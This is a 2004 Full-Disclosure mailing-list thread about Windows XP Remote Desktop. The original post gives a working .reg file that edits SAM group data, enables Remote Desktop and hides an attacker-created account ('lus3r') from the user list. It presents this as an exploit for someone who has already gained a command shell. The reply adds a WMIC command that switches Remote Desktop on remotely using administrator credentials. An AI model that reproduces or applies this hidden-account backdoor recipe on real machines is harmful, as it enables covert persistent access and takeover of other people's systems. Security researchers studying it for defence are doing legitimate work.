RE: XP Remote Desktop Remote Activation

["Dominick Baier" <seclists () leastprivilege com>]

if you have an administrator password for the machine you can just use WMIC
to turn remote desktop on.

wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server"
CALL SetAllowTSConnections 1

dominick
www.leastprivilege.com

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of Fixer
Sent: Samstag, 2. Oktober 2004 06:51
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] XP Remote Desktop Remote Activation

XP Remote Desktop Remote Activation


Information
____________________________________________________________________
Windows XP Professional provides a service called Remote Desktop, which
allows a user to remotely control the desktop as if he or she were in front
of the system locally (ala VNC, pcAnywhere, etc.).

By default, Remote Desktop is shipped with this service turned off and only
the Administrator is allowed access to this service.  It is possible,
however, to modify a series of registry keys that may allow a malicious user
who has already gained a command shell to activate Remote Desktop and add a
user they have created for themselves as well as to hide that user so that
it will not show up as a user in the Remote Desktop user list.  The
instructions for this are attached. 
Additionally, I have listed a sample .reg file of the type that is discussed
in the instructions below.
_____________________________________________________________________

Final Stuff

To the Frozen Chozen...On-On (www.frozen-chozen-h3.org)  

On to the exploit....   Fixer


_____________________________________________________________________

.reg file  (remember, the xx xx are the values you need to change)

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\0000022B]
"C"=hex:2b,02,00,00,00,00,00,00,b0,00,00,00,02,00,01,00,b0,00,00,00,28,00,00
,\
 
00,00,00,00,00,d8,00,00,00,7a,00,00,00,00,00,00,00,54,01,00,00,1c,00,00,00,\
 
01,00,00,00,01,00,14,80,90,00,00,00,a0,00,00,00,14,00,00,00,44,00,00,00,02,\
 
00,30,00,02,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
 
00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,00,4c,\
 
00,03,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,01,00,00,00,00,\
 
00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,\
 
00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,01,02,\
 
00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,\
 
00,20,02,00,00,52,00,65,00,6d,00,6f,00,74,00,65,00,20,00,44,00,65,00,73,00,\
 
6b,00,74,00,6f,00,70,00,20,00,55,00,73,00,65,00,72,00,73,00,4d,00,65,00,6d,\
 
00,62,00,65,00,72,00,73,00,20,00,69,00,6e,00,20,00,74,00,68,00,69,00,73,00,\
 
20,00,67,00,72,00,6f,00,75,00,70,00,20,00,61,00,72,00,65,00,20,00,67,00,72,\
 
00,61,00,6e,00,74,00,65,00,64,00,20,00,74,00,68,00,65,00,20,00,72,00,69,00,\
 
67,00,68,00,74,00,20,00,74,00,6f,00,20,00,6c,00,6f,00,67,00,6f,00,6e,00,20,\
 
00,72,00,65,00,6d,00,6f,00,74,00,65,00,6c,00,79,00,00,00,01,05,00,00,00,00,\
  00,05,15,00,00,00,d8,52,bb,80,c4,9d,6f,b9,b9,67,c7,13,xx,xx,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"lus3r"=dword:00000000

(obviously change "lus3r" to the name of the account you created)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html